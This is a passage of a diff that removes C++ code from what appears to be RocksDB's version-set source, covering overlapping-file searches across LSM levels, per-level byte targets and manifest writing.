-            [this](const FdWithKeyRange& f1, const FdWithKeyRange& f2) -> bool {
-              return (internal_comparator_->Compare(f1.smallest_key,
-                                                    f2.smallest_key) < 0);
-            });
-
-  for (size_t i = 1; i < level0_sorted_file.size(); ++i) {
-    FdWithKeyRange& f = level0_sorted_file[i];
-    FdWithKeyRange& prev = level0_sorted_file[i - 1];
-    if (internal_comparator_->Compare(prev.largest_key, f.smallest_key) >= 0) {
-      level0_non_overlapping_ = false;
-      break;
-    }
-  }
-}
-
-void Version::Ref() {
-  ++refs_;
-}
-
-bool Version::Unref() {
-  assert(refs_ >= 1);
-  --refs_;
-  if (refs_ == 0) {
-    delete this;
-    return true;
-  }
-  return false;
-}
-
-bool VersionStorageInfo::OverlapInLevel(int level,
-                                        const Slice* smallest_user_key,
-                                        const Slice* largest_user_key) {
-  if (level >= num_non_empty_levels_) {
-    // empty level, no overlap
-    return false;
-  }
-  return SomeFileOverlapsRange(*internal_comparator_, (level > 0),
-                               level_files_brief_[level], smallest_user_key,
-                               largest_user_key);
-}
-
-// Store in "*inputs" all files in "level" that overlap [begin,end]
-// If hint_index is specified, then it points to a file in the
-// overlapping range.
-// The file_index returns a pointer to any file in an overlapping range.
-void VersionStorageInfo::GetOverlappingInputs(
-    int level, const InternalKey* begin, const InternalKey* end,
-    std::vector<FileMetaData*>* inputs, int hint_index, int* file_index,
-    bool expand_range) const {
-  if (level >= num_non_empty_levels_) {
-    // this level is empty, no overlapping inputs
-    return;
-  }
-
-  inputs->clear();
-  Slice user_begin, user_end;
-  if (begin != nullptr) {
-    user_begin = begin->user_key();
-  }
-  if (end != nullptr) {
-    user_end = end->user_key();
-  }
-  if (file_index) {
-    *file_index = -1;
-  }
-  const Comparator* user_cmp = user_comparator_;
-  if (begin != nullptr && end != nullptr && level > 0) {
-    GetOverlappingInputsRangeBinarySearch(level, user_begin, user_end, inputs,
-                                          hint_index, file_index);
-    return;
-  }
-
-  for (size_t i = 0; i < level_files_brief_[level].num_files; ) {
-    FdWithKeyRange* f = &(level_files_brief_[level].files[i++]);
-    const Slice file_start = ExtractUserKey(f->smallest_key);
-    const Slice file_limit = ExtractUserKey(f->largest_key);
-    if (begin != nullptr && user_cmp->Compare(file_limit, user_begin) < 0) {
-      // "f" is completely before specified range; skip it
-    } else if (end != nullptr && user_cmp->Compare(file_start, user_end) > 0) {
-      // "f" is completely after specified range; skip it
-    } else {
-      inputs->push_back(files_[level][i-1]);
-      if (level == 0 && expand_range) {
-        // Level-0 files may overlap each other.  So check if the newly
-        // added file has expanded the range.  If so, restart search.
-        if (begin != nullptr && user_cmp->Compare(file_start, user_begin) < 0) {
-          user_begin = file_start;
-          inputs->clear();
-          i = 0;
-        } else if (end != nullptr
-            && user_cmp->Compare(file_limit, user_end) > 0) {
-          user_end = file_limit;
-          inputs->clear();
-          i = 0;
-        }
-      } else if (file_index) {
-        *file_index = static_cast<int>(i) - 1;
-      }
-    }
-  }
-}
-
-// Store in "*inputs" files in "level" that within range [begin,end]
-// Guarantee a "clean cut" boundary between the files in inputs
-// and the surrounding files and the maxinum number of files.
-// This will ensure that no parts of a key are lost during compaction.
-// If hint_index is specified, then it points to a file in the range.
-// The file_index returns a pointer to any file in an overlapping range.
-void VersionStorageInfo::GetCleanInputsWithinInterval(
-    int level, const InternalKey* begin, const InternalKey* end,
-    std::vector<FileMetaData*>* inputs, int hint_index, int* file_index) const {
-  if (level >= num_non_empty_levels_) {
-    // this level is empty, no inputs within range
-    return;
-  }
-
-  inputs->clear();
-  Slice user_begin, user_end;
-  if (begin != nullptr) {
-    user_begin = begin->user_key();
-  }
-  if (end != nullptr) {
-    user_end = end->user_key();
-  }
-  if (file_index) {
-    *file_index = -1;
-  }
-  if (begin != nullptr && end != nullptr && level > 0) {
-    GetOverlappingInputsRangeBinarySearch(level, user_begin, user_end, inputs,
-                                          hint_index, file_index,
-                                          true /* within_interval */);
-  }
-}
-
-// Store in "*inputs" all files in "level" that overlap [begin,end]
-// Employ binary search to find at least one file that overlaps the
-// specified range. From that file, iterate backwards and
-// forwards to find all overlapping files.
-// if within_range is set, then only store the maximum clean inputs
-// within range [begin, end]. "clean" means there is a boudnary
-// between the files in "*inputs" and the surrounding files
-void VersionStorageInfo::GetOverlappingInputsRangeBinarySearch(
-    int level, const Slice& user_begin, const Slice& user_end,
-    std::vector<FileMetaData*>* inputs, int hint_index, int* file_index,
-    bool within_interval) const {
-  assert(level > 0);
-  int min = 0;
-  int mid = 0;
-  int max = static_cast<int>(files_[level].size()) - 1;
-  bool foundOverlap = false;
-  const Comparator* user_cmp = user_comparator_;
-
-  // if the caller already knows the index of a file that has overlap,
-  // then we can skip the binary search.
-  if (hint_index != -1) {
-    mid = hint_index;
-    foundOverlap = true;
-  }
-
-  while (!foundOverlap && min <= max) {
-    mid = (min + max)/2;
-    FdWithKeyRange* f = &(level_files_brief_[level].files[mid]);
-    const Slice file_start = ExtractUserKey(f->smallest_key);
-    const Slice file_limit = ExtractUserKey(f->largest_key);
-    if ((!within_interval && user_cmp->Compare(file_limit, user_begin) < 0) ||
-        (within_interval && user_cmp->Compare(file_start, user_begin) < 0)) {
-      min = mid + 1;
-    } else if ((!within_interval &&
-                user_cmp->Compare(user_end, file_start) < 0) ||
-               (within_interval &&
-                user_cmp->Compare(user_end, file_limit) < 0)) {
-      max = mid - 1;
-    } else {
-      foundOverlap = true;
-      break;
-    }
-  }
-
-  // If there were no overlapping files, return immediately.
-  if (!foundOverlap) {
-    return;
-  }
-  // returns the index where an overlap is found
-  if (file_index) {
-    *file_index = mid;
-  }
-
-  int start_index, end_index;
-  if (within_interval) {
-    ExtendFileRangeWithinInterval(level, user_begin, user_end, mid, &start_index,
-                                  &end_index);
-  } else {
-    ExtendFileRangeOverlappingInterval(level, user_begin, user_end, mid,
-                                       &start_index, &end_index);
-  }
-  assert(end_index >= start_index);
-  // insert overlapping files into vector
-  for (int i = start_index; i <= end_index; i++) {
-    inputs->push_back(files_[level][i]);
-  }
-}
-
-// Store in *start_index and *end_index the range of all files in
-// "level" that overlap [begin,end]
-// The mid_index specifies the index of at least one file that
-// overlaps the specified range. From that file, iterate backward
-// and forward to find all overlapping files.
-// Use FileLevel in searching, make it faster
-void VersionStorageInfo::ExtendFileRangeOverlappingInterval(
-    int level, const Slice& user_begin, const Slice& user_end,
-    unsigned int mid_index, int* start_index, int* end_index) const {
-  const Comparator* user_cmp = user_comparator_;
-  const FdWithKeyRange* files = level_files_brief_[level].files;
-#ifndef NDEBUG
-  {
-    // assert that the file at mid_index overlaps with the range
-    assert(mid_index < level_files_brief_[level].num_files);
-    const FdWithKeyRange* f = &files[mid_index];
-    const Slice fstart = ExtractUserKey(f->smallest_key);
-    const Slice flimit = ExtractUserKey(f->largest_key);
-    if (user_cmp->Compare(fstart, user_begin) >= 0) {
-      assert(user_cmp->Compare(fstart, user_end) <= 0);
-    } else {
-      assert(user_cmp->Compare(flimit, user_begin) >= 0);
-    }
-  }
-#endif
-  *start_index = mid_index + 1;
-  *end_index = mid_index;
-  int count __attribute__((unused)) = 0;
-
-  // check backwards from 'mid' to lower indices
-  for (int i = mid_index; i >= 0 ; i--) {
-    const FdWithKeyRange* f = &files[i];
-    const Slice file_limit = ExtractUserKey(f->largest_key);
-    if (user_cmp->Compare(file_limit, user_begin) >= 0) {
-      *start_index = i;
-      assert((count++, true));
-    } else {
-      break;
-    }
-  }
-  // check forward from 'mid+1' to higher indices
-  for (unsigned int i = mid_index+1;
-       i < level_files_brief_[level].num_files; i++) {
-    const FdWithKeyRange* f = &files[i];
-    const Slice file_start = ExtractUserKey(f->smallest_key);
-    if (user_cmp->Compare(file_start, user_end) <= 0) {
-      assert((count++, true));
-      *end_index = i;
-    } else {
-      break;
-    }
-  }
-  assert(count == *end_index - *start_index + 1);
-}
-
-// Store in *start_index and *end_index the clean range of all files in
-// "level" within [begin,end]
-// The mid_index specifies the index of at least one file within
-// the specified range. From that file, iterate backward
-// and forward to find all overlapping files and then "shrink" to
-// the clean range required.
-// Use FileLevel in searching, make it faster
-void VersionStorageInfo::ExtendFileRangeWithinInterval(
-    int level, const Slice& user_begin, const Slice& user_end,
-    unsigned int mid_index, int* start_index, int* end_index) const {
-  assert(level != 0);
-  const Comparator* user_cmp = user_comparator_;
-  const FdWithKeyRange* files = level_files_brief_[level].files;
-#ifndef NDEBUG
-  {
-    // assert that the file at mid_index is within the range
-    assert(mid_index < level_files_brief_[level].num_files);
-    const FdWithKeyRange* f = &files[mid_index];
-    const Slice fstart = ExtractUserKey(f->smallest_key);
-    const Slice flimit = ExtractUserKey(f->largest_key);
-    assert(user_cmp->Compare(fstart, user_begin) >= 0 &&
-           user_cmp->Compare(flimit, user_end) <= 0);
-  }
-#endif
-  ExtendFileRangeOverlappingInterval(level, user_begin, user_end, mid_index,
-                                     start_index, end_index);
-  int left = *start_index;
-  int right = *end_index;
-  // shrink from left to right
-  while (left <= right) {
-    const Slice& first_key_in_range = ExtractUserKey(files[left].smallest_key);
-    if (user_cmp->Compare(first_key_in_range, user_begin) < 0) {
-      left++;
-      continue;
-    }
-    if (left > 0) {  // If not first file
-      const Slice& last_key_before =
-          ExtractUserKey(files[left - 1].largest_key);
-      if (user_cmp->Equal(first_key_in_range, last_key_before)) {
-        // The first user key in range overlaps with the previous file's last
-        // key
-        left++;
-        continue;
-      }
-    }
-    break;
-  }
-  // shrink from right to left
-  while (left <= right) {
-    const Slice last_key_in_range = ExtractUserKey(files[right].largest_key);
-    if (user_cmp->Compare(last_key_in_range, user_end) > 0) {
-      right--;
-      continue;
-    }
-    if (right < static_cast<int>(level_files_brief_[level].num_files) -
-                    1) {  // If not the last file
-      const Slice first_key_after =
-          ExtractUserKey(files[right + 1].smallest_key);
-      if (user_cmp->Equal(last_key_in_range, first_key_after)) {
-        // The last user key in range overlaps with the next file's first key
-        right--;
-        continue;
-      }
-    }
-    break;
-  }
-
-  *start_index = left;
-  *end_index = right;
-}
-
-uint64_t VersionStorageInfo::NumLevelBytes(int level) const {
-  assert(level >= 0);
-  assert(level < num_levels());
-  return TotalFileSize(files_[level]);
-}
-
-const char* VersionStorageInfo::LevelSummary(
-    LevelSummaryStorage* scratch) const {
-  int len = 0;
-  if (compaction_style_ == kCompactionStyleLevel && num_levels() > 1) {
-    assert(base_level_ < static_cast<int>(level_max_bytes_.size()));
-    len = snprintf(scratch->buffer, sizeof(scratch->buffer),
-                   "base level %d max bytes base %" PRIu64 " ", base_level_,
-                   level_max_bytes_[base_level_]);
-  }
-  len +=
-      snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len, "files[");
-  for (int i = 0; i < num_levels(); i++) {
-    int sz = sizeof(scratch->buffer) - len;
-    int ret = snprintf(scratch->buffer + len, sz, "%d ", int(files_[i].size()));
-    if (ret < 0 || ret >= sz) break;
-    len += ret;
-  }
-  if (len > 0) {
-    // overwrite the last space
-    --len;
-  }
-  len += snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-                  "] max score %.2f", compaction_score_[0]);
-
-  if (!files_marked_for_compaction_.empty()) {
-    snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len,
-             " (%" ROCKSDB_PRIszt " files need compaction)",
-             files_marked_for_compaction_.size());
-  }
-
-  return scratch->buffer;
-}
-
-const char* VersionStorageInfo::LevelFileSummary(FileSummaryStorage* scratch,
-                                                 int level) const {
-  int len = snprintf(scratch->buffer, sizeof(scratch->buffer), "files_size[");
-  for (const auto& f : files_[level]) {
-    int sz = sizeof(scratch->buffer) - len;
-    char sztxt[16];
-    AppendHumanBytes(f->fd.GetFileSize(), sztxt, sizeof(sztxt));
-    int ret = snprintf(scratch->buffer + len, sz,
-                       "#%" PRIu64 "(seq=%" PRIu64 ",sz=%s,%d) ",
-                       f->fd.GetNumber(), f->smallest_seqno, sztxt,
-                       static_cast<int>(f->being_compacted));
-    if (ret < 0 || ret >= sz)
-      break;
-    len += ret;
-  }
-  // overwrite the last space (only if files_[level].size() is non-zero)
-  if (files_[level].size() && len > 0) {
-    --len;
-  }
-  snprintf(scratch->buffer + len, sizeof(scratch->buffer) - len, "]");
-  return scratch->buffer;
-}
-
-int64_t VersionStorageInfo::MaxNextLevelOverlappingBytes() {
-  uint64_t result = 0;
-  std::vector<FileMetaData*> overlaps;
-  for (int level = 1; level < num_levels() - 1; level++) {
-    for (const auto& f : files_[level]) {
-      GetOverlappingInputs(level + 1, &f->smallest, &f->largest, &overlaps);
-      const uint64_t sum = TotalFileSize(overlaps);
-      if (sum > result) {
-        result = sum;
-      }
-    }
-  }
-  return result;
-}
-
-uint64_t VersionStorageInfo::MaxBytesForLevel(int level) const {
-  // Note: the result for level zero is not really used since we set
-  // the level-0 compaction threshold based on number of files.
-  assert(level >= 0);
-  assert(level < static_cast<int>(level_max_bytes_.size()));
-  return level_max_bytes_[level];
-}
-
-void VersionStorageInfo::CalculateBaseBytes(const ImmutableCFOptions& ioptions,
-                                            const MutableCFOptions& options) {
-  // Special logic to set number of sorted runs.
-  // It is to match the previous behavior when all files are in L0.
-  int num_l0_count = static_cast<int>(files_[0].size());
-  if (compaction_style_ == kCompactionStyleUniversal) {
-    // For universal compaction, we use level0 score to indicate
-    // compaction score for the whole DB. Adding other levels as if
-    // they are L0 files.
-    for (int i = 1; i < num_levels(); i++) {
-      if (!files_[i].empty()) {
-        num_l0_count++;
-      }
-    }
-  }
-  set_l0_delay_trigger_count(num_l0_count);
-
-  level_max_bytes_.resize(ioptions.num_levels);
-  if (!ioptions.level_compaction_dynamic_level_bytes) {
-    base_level_ = (ioptions.compaction_style == kCompactionStyleLevel) ? 1 : -1;
-
-    // Calculate for static bytes base case
-    for (int i = 0; i < ioptions.num_levels; ++i) {
-      if (i == 0 && ioptions.compaction_style == kCompactionStyleUniversal) {
-        level_max_bytes_[i] = options.max_bytes_for_level_base;
-      } else if (i > 1) {
-        level_max_bytes_[i] = MultiplyCheckOverflow(
-            MultiplyCheckOverflow(level_max_bytes_[i - 1],
-                                  options.max_bytes_for_level_multiplier),
-            options.MaxBytesMultiplerAdditional(i - 1));
-      } else {
-        level_max_bytes_[i] = options.max_bytes_for_level_base;
-      }
-    }
-  } else {
-    uint64_t max_level_size = 0;
-
-    int first_non_empty_level = -1;
-    // Find size of non-L0 level of most data.
-    // Cannot use the size of the last level because it can be empty or less
-    // than previous levels after compaction.
-    for (int i = 1; i < num_levels_; i++) {
-      uint64_t total_size = 0;
-      for (const auto& f : files_[i]) {
-        total_size += f->fd.GetFileSize();
-      }
-      if (total_size > 0 && first_non_empty_level == -1) {
-        first_non_empty_level = i;
-      }
-      if (total_size > max_level_size) {
-        max_level_size = total_size;
-      }
-    }
-
-    // Prefill every level's max bytes to disallow compaction from there.
-    for (int i = 0; i < num_levels_; i++) {
-      level_max_bytes_[i] = std::numeric_limits<uint64_t>::max();
-    }
-
-    if (max_level_size == 0) {
-      // No data for L1 and up. L0 compacts to last level directly.
-      // No compaction from L1+ needs to be scheduled.
-      base_level_ = num_levels_ - 1;
-    } else {
-      uint64_t base_bytes_max = options.max_bytes_for_level_base;
-      uint64_t base_bytes_min = static_cast<uint64_t>(
-          base_bytes_max / options.max_bytes_for_level_multiplier);
-
-      // Try whether we can make last level's target size to be max_level_size
-      uint64_t cur_level_size = max_level_size;
-      for (int i = num_levels_ - 2; i >= first_non_empty_level; i--) {
-        // Round up after dividing
-        cur_level_size = static_cast<uint64_t>(
-            cur_level_size / options.max_bytes_for_level_multiplier);
-      }
-
-      // Calculate base level and its size.
-      uint64_t base_level_size;
-      if (cur_level_size <= base_bytes_min) {
-        // Case 1. If we make target size of last level to be max_level_size,
-        // target size of the first non-empty level would be smaller than
-        // base_bytes_min. We set it be base_bytes_min.
-        base_level_size = base_bytes_min + 1U;
-        base_level_ = first_non_empty_level;
-        ROCKS_LOG_WARN(ioptions.info_log,
-                       "More existing levels in DB than needed. "
-                       "max_bytes_for_level_multiplier may not be guaranteed.");
-      } else {
-        // Find base level (where L0 data is compacted to).
-        base_level_ = first_non_empty_level;
-        while (base_level_ > 1 && cur_level_size > base_bytes_max) {
-          --base_level_;
-          cur_level_size = static_cast<uint64_t>(
-              cur_level_size / options.max_bytes_for_level_multiplier);
-        }
-        if (cur_level_size > base_bytes_max) {
-          // Even L1 will be too large
-          assert(base_level_ == 1);
-          base_level_size = base_bytes_max;
-        } else {
-          base_level_size = cur_level_size;
-        }
-      }
-
-      uint64_t level_size = base_level_size;
-      for (int i = base_level_; i < num_levels_; i++) {
-        if (i > base_level_) {
-          level_size = MultiplyCheckOverflow(
-              level_size, options.max_bytes_for_level_multiplier);
-        }
-        // Don't set any level below base_bytes_max. Otherwise, the LSM can
-        // assume an hourglass shape where L1+ sizes are smaller than L0. This
-        // causes compaction scoring, which depends on level sizes, to favor L1+
-        // at the expense of L0, which may fill up and stall.
-        level_max_bytes_[i] = std::max(level_size, base_bytes_max);
-      }
-    }
-  }
-}
-
-uint64_t VersionStorageInfo::EstimateLiveDataSize() const {
-  // Estimate the live data size by adding up the size of the last level for all
-  // key ranges. Note: Estimate depends on the ordering of files in level 0
-  // because files in level 0 can be overlapping.
-  uint64_t size = 0;
-
-  auto ikey_lt = [this](InternalKey* x, InternalKey* y) {
-    return internal_comparator_->Compare(*x, *y) < 0;
-  };
-  // (Ordered) map of largest keys in non-overlapping files
-  std::map<InternalKey*, FileMetaData*, decltype(ikey_lt)> ranges(ikey_lt);
-
-  for (int l = num_levels_ - 1; l >= 0; l--) {
-    bool found_end = false;
-    for (auto file : files_[l]) {
-      // Find the first file where the largest key is larger than the smallest
-      // key of the current file. If this file does not overlap with the
-      // current file, none of the files in the map does. If there is
-      // no potential overlap, we can safely insert the rest of this level
-      // (if the level is not 0) into the map without checking again because
-      // the elements in the level are sorted and non-overlapping.
-      auto lb = (found_end && l != 0) ?
-        ranges.end() : ranges.lower_bound(&file->smallest);
-      found_end = (lb == ranges.end());
-      if (found_end || internal_comparator_->Compare(
-            file->largest, (*lb).second->smallest) < 0) {
-          ranges.emplace_hint(lb, &file->largest, file);
-          size += file->fd.file_size;
-      }
-    }
-  }
-  return size;
-}
-
-
-void Version::AddLiveFiles(std::vector<FileDescriptor>* live) {
-  for (int level = 0; level < storage_info_.num_levels(); level++) {
-    const std::vector<FileMetaData*>& files = storage_info_.files_[level];
-    for (const auto& file : files) {
-      live->push_back(file->fd);
-    }
-  }
-}
-
-std::string Version::DebugString(bool hex, bool print_stats) const {
-  std::string r;
-  for (int level = 0; level < storage_info_.num_levels_; level++) {
-    // E.g.,
-    //   --- level 1 ---
-    //   17:123['a' .. 'd']
-    //   20:43['e' .. 'g']
-    //
-    // if print_stats=true:
-    //   17:123['a' .. 'd'](4096)
-    r.append("--- level ");
-    AppendNumberTo(&r, level);
-    r.append(" --- version# ");
-    AppendNumberTo(&r, version_number_);
-    r.append(" ---\n");
-    const std::vector<FileMetaData*>& files = storage_info_.files_[level];
-    for (size_t i = 0; i < files.size(); i++) {
-      r.push_back(' ');
-      AppendNumberTo(&r, files[i]->fd.GetNumber());
-      r.push_back(':');
-      AppendNumberTo(&r, files[i]->fd.GetFileSize());
-      r.append("[");
-      r.append(files[i]->smallest.DebugString(hex));
-      r.append(" .. ");
-      r.append(files[i]->largest.DebugString(hex));
-      r.append("]");
-      if (print_stats) {
-        r.append("(");
-        r.append(ToString(
-            files[i]->stats.num_reads_sampled.load(std::memory_order_relaxed)));
-        r.append(")");
-      }
-      r.append("\n");
-    }
-  }
-  return r;
-}
-
-// this is used to batch writes to the manifest file
-struct VersionSet::ManifestWriter {
-  Status status;
-  bool done;
-  InstrumentedCondVar cv;
-  ColumnFamilyData* cfd;
-  const autovector<VersionEdit*>& edit_list;
-
-  explicit ManifestWriter(InstrumentedMutex* mu, ColumnFamilyData* _cfd,
-                          const autovector<VersionEdit*>& e)
-      : done(false), cv(mu), cfd(_cfd), edit_list(e) {}
-};
-
-VersionSet::VersionSet(const std::string& dbname,
-                       const ImmutableDBOptions* db_options,
-                       const EnvOptions& storage_options, Cache* table_cache,
-                       WriteBufferManager* write_buffer_manager,
-                       WriteController* write_controller)
-    : column_family_set_(
-          new ColumnFamilySet(dbname, db_options, storage_options, table_cache,
-                              write_buffer_manager, write_controller)),
-      env_(db_options->env),
-      dbname_(dbname),
-      db_options_(db_options),
-      next_file_number_(2),
-      manifest_file_number_(0),  // Filled by Recover()
-      pending_manifest_file_number_(0),
-      last_sequence_(0),
-      last_to_be_written_sequence_(0),
-      prev_log_number_(0),
-      current_version_number_(0),
-      manifest_file_size_(0),
-      env_options_(storage_options),
-      env_options_compactions_(
-          env_->OptimizeForCompactionTableRead(env_options_, *db_options_)) {}
-
-void CloseTables(void* ptr, size_t) {
-  TableReader* table_reader = reinterpret_cast<TableReader*>(ptr);
-  table_reader->Close();
-}
-
-VersionSet::~VersionSet() {
-  // we need to delete column_family_set_ because its destructor depends on
-  // VersionSet
-  Cache* table_cache = column_family_set_->get_table_cache();
-  table_cache->ApplyToAllCacheEntries(&CloseTables, false /* thread_safe */);
-  column_family_set_.reset();
-  for (auto file : obsolete_files_) {
-    if (file->table_reader_handle) {
-      table_cache->Release(file->table_reader_handle);
-      TableCache::Evict(table_cache, file->fd.GetNumber());
-    }
-    delete file;
-  }
-  obsolete_files_.clear();
-}
-
-void VersionSet::AppendVersion(ColumnFamilyData* column_family_data,
-                               Version* v) {
-  // compute new compaction score
-  v->storage_info()->ComputeCompactionScore(
-      *column_family_data->ioptions(),
-      *column_family_data->GetLatestMutableCFOptions());
-
-  // Mark v finalized
-  v->storage_info_.SetFinalized();
-
-  // Make "v" current
-  assert(v->refs_ == 0);
-  Version* current = column_family_data->current();
-  assert(v != current);
-  if (current != nullptr) {
-    assert(current->refs_ > 0);
-    current->Unref();
-  }
-  column_family_data->SetCurrent(v);
-  v->Ref();
-
-  // Append to linked list
-  v->prev_ = column_family_data->dummy_versions()->prev_;
-  v->next_ = column_family_data->dummy_versions();
-  v->prev_->next_ = v;
-  v->next_->prev_ = v;
-}
-
-Status VersionSet::LogAndApply(ColumnFamilyData* column_family_data,
-                               const MutableCFOptions& mutable_cf_options,
-                               const autovector<VersionEdit*>& edit_list,
-                               InstrumentedMutex* mu, Directory* db_directory,
-                               bool new_descriptor_log,
-                               const ColumnFamilyOptions* new_cf_options) {
-  mu->AssertHeld();
-  // num of edits
-  auto num_edits = edit_list.size();
-  if (num_edits == 0) {
-    return Status::OK();
-  } else if (num_edits > 1) {
-#ifndef NDEBUG
-    // no group commits for column family add or drop
-    for (auto& edit : edit_list) {
-      assert(!edit->IsColumnFamilyManipulation());
-    }
-#endif
-  }
-
-  // column_family_data can be nullptr only if this is column_family_add.
-  // in that case, we also need to specify ColumnFamilyOptions
-  if (column_family_data == nullptr) {
-    assert(num_edits == 1);
-    assert(edit_list[0]->is_column_family_add_);
-    assert(new_cf_options != nullptr);
-  }
-
-  // queue our request
-  ManifestWriter w(mu, column_family_data, edit_list);
-  manifest_writers_.push_back(&w);
-  while (!w.done && &w != manifest_writers_.front()) {
-    w.cv.Wait();
-  }
-  if (w.done) {
-    return w.status;
-  }
-  if (column_family_data != nullptr && column_family_data->IsDropped()) {
-    // if column family is dropped by the time we get here, no need to write
-    // anything to the manifest
-    manifest_writers_.pop_front();
-    // Notify new head of write queue
-    if (!manifest_writers_.empty()) {
-      manifest_writers_.front()->cv.Signal();
-    }
-    // we steal this code to also inform about cf-drop
-    return Status::ShutdownInProgress();
-  }
-
-  autovector<VersionEdit*> batch_edits;
-  Version* v = nullptr;
-  std::unique_ptr<BaseReferencedVersionBuilder> builder_guard(nullptr);
-
-  // process all requests in the queue
-  ManifestWriter* last_writer = &w;
-  assert(!manifest_writers_.empty());
-  assert(manifest_writers_.front() == &w);
-  if (w.edit_list.front()->IsColumnFamilyManipulation()) {
-    // no group commits for column family add or drop
-    LogAndApplyCFHelper(w.edit_list.front());
-    batch_edits.push_back(w.edit_list.front());
-  } else {
-    v = new Version(column_family_data, this, current_version_number_++);
-    builder_guard.reset(new BaseReferencedVersionBuilder(column_family_data));
-    auto* builder = builder_guard->version_builder();
-    for (const auto& writer : manifest_writers_) {
-      if (writer->edit_list.front()->IsColumnFamilyManipulation() ||
-          writer->cfd->GetID() != column_family_data->GetID()) {
-        // no group commits for column family add or drop
-        // also, group commits across column families are not supported
-        break;
-      }
-      last_writer = writer;
-      for (const auto& edit : writer->edit_list) {
-        LogAndApplyHelper(column_family_data, builder, v, edit, mu);
-        batch_edits.push_back(edit);
-      }
-    }
-    builder->SaveTo(v->storage_info());
-  }
-
-  // Initialize new descriptor log file if necessary by creating
-  // a temporary file that contains a snapshot of the current version.
-  uint64_t new_manifest_file_size = 0;
-  Status s;
-
-  assert(pending_manifest_file_number_ == 0);
-  if (!descriptor_log_ ||
-      manifest_file_size_ > db_options_->max_manifest_file_size) {
-    pending_manifest_file_number_ = NewFileNumber();
-    batch_edits.back()->SetNextFile(next_file_number_.load());
-    new_descriptor_log = true;
-  } else {
-    pending_manifest_file_number_ = manifest_file_number_;
-  }
-
-  if (new_descriptor_log) {
-    // if we're writing out new snapshot make sure to persist max column family
-    if (column_family_set_->GetMaxColumnFamily() > 0) {
-      w.edit_list.front()->SetMaxColumnFamily(
-          column_family_set_->GetMaxColumnFamily());
-    }
-  }
-
-  // Unlock during expensive operations. New writes cannot get here
-  // because &w is ensuring that all new writes get queued.
-  {
-
-    mu->Unlock();
-
-    TEST_SYNC_POINT("VersionSet::LogAndApply:WriteManifest");
-    if (!w.edit_list.front()->IsColumnFamilyManipulation() &&
-        this->GetColumnFamilySet()->get_table_cache()->GetCapacity() ==
-            TableCache::kInfiniteCapacity) {
-      // unlimited table cache. Pre-load table handle now.
-      // Need to do it out of the mutex.
-      builder_guard->version_builder()->LoadTableHandlers(
-          column_family_data->internal_stats(),
-          column_family_data->ioptions()->optimize_filters_for_hits,
-          true /* prefetch_index_and_filter_in_cache */);
-    }
-
-    // This is fine because everything inside of this block is serialized --
-    // only one thread can be here at the same time
-    if (new_descriptor_log) {
-      // create manifest file
-      ROCKS_LOG_INFO(db_options_->info_log, "Creating manifest %" PRIu64 "\n",
-                     pending_manifest_file_number_);
-      unique_ptr<WritableFile> descriptor_file;
-      EnvOptions opt_env_opts = env_->OptimizeForManifestWrite(env_options_);
-      s = NewWritableFile(
-          env_, DescriptorFileName(dbname_, pending_manifest_file_number_),
-          &descriptor_file, opt_env_opts);
-      if (s.ok()) {
-        descriptor_file->SetPreallocationBlockSize(
-            db_options_->manifest_preallocation_size);
-
-        unique_ptr<WritableFileWriter> file_writer(
-            new WritableFileWriter(std::move(descriptor_file), opt_env_opts));
-        descriptor_log_.reset(
-            new log::Writer(std::move(file_writer), 0, false));
-        s = WriteSnapshot(descriptor_log_.get());
-      }
-    }
-
-    if (!w.edit_list.front()->IsColumnFamilyManipulation()) {
-      // This is cpu-heavy operations, which should be called outside mutex.
-      v->PrepareApply(mutable_cf_options, true);
-    }
-
-    // Write new record to MANIFEST log
-    if (s.ok()) {
-      for (auto& e : batch_edits) {
-        std::string record;
-        if (!e->EncodeTo(&record)) {
-          s = Status::Corruption(
-              "Unable to Encode VersionEdit:" + e->DebugString(true));
-          break;
-        }
-        TEST_KILL_RANDOM("VersionSet::LogAndApply:BeforeAddRecord",
-                         rocksdb_kill_odds * REDUCE_ODDS2);
-        s = descriptor_log_->AddRecord(record);
-        if (!s.ok()) {
-          break;
-        }
-      }
-      if (s.ok()) {
-        s = SyncManifest(env_, db_options_, descriptor_log_->file());
-      }
-      if (!s.ok()) {
-        ROCKS_LOG_ERROR(db_options_->info_log, "MANIFEST write: %s\n",
-                        s.ToString().c_str());
-      }
-    }
-
-    // If we just created a new descriptor file, install it by writing a
-    // new CURRENT file that points to it.
-    if (s.ok() && new_descriptor_log) {
-      s = SetCurrentFile(env_, dbname_, pending_manifest_file_number_,
-                         db_directory);
-    }
-
-    if (s.ok()) {
-      // find offset in manifest file where this version is stored.
-      new_manifest_file_size = descriptor_log_->file()->GetFileSize();
-    }
-
-    if (w.edit_list.front()->is_column_family_drop_) {
-      TEST_SYNC_POINT("VersionSet::LogAndApply::ColumnFamilyDrop:0");
-      TEST_SYNC_POINT("VersionSet::LogAndApply::ColumnFamilyDrop:1");
-      TEST_SYNC_POINT("VersionSet::LogAndApply::ColumnFamilyDrop:2");
-    }
-
-    LogFlush(db_options_->info_log);
-    TEST_SYNC_POINT("VersionSet::LogAndApply:WriteManifestDone");
-    mu->Lock();
-  }
-
-  // Append the old mainfest file to the obsolete_manifests_ list to be deleted
-  // by PurgeObsoleteFiles later.
-  if (s.ok() && new_descriptor_log) {
-    obsolete_manifests_.emplace_back(
-        DescriptorFileName("", manifest_file_number_));
-  }
-
-  // Install the new version
-  if (s.ok()) {
-    if (w.edit_list.front()->is_column_family_add_) {
-      // no group commit on column family add
-      assert(batch_edits.size() == 1);
-      assert(new_cf_options != nullptr);
-      CreateColumnFamily(*new_cf_options, w.edit_list.front());
-    } else if (w.edit_list.front()->is_column_family_drop_) {
-      assert(batch_edits.size() == 1);
-      column_family_data->SetDropped();
-      if (column_family_data->Unref()) {
-        delete column_family_data;
-      }
-    } else {
-      uint64_t max_log_number_in_batch  = 0;
-      for (auto& e : batch_edits) {
-        if (e->has_log_number_) {
-          max_log_number_in_batch =
-              std::max(max_log_number_in_batch, e->log_number_);
-        }
-      }
-      if (max_log_number_in_batch != 0) {
-        assert(column_family_data->GetLogNumber() <= max_log_number_in_batch);
-        column_family_data->SetLogNumber(max_log_number_in_batch);
-      }
-      AppendVersion(column_family_data, v);
-    }
-
-    manifest_file_number_ = pending_manifest_file_number_;
-    manifest_file_size_ = new_manifest_file_size;
-    prev_log_number_ = w.edit_list.front()->prev_log_number_;
-  } else {
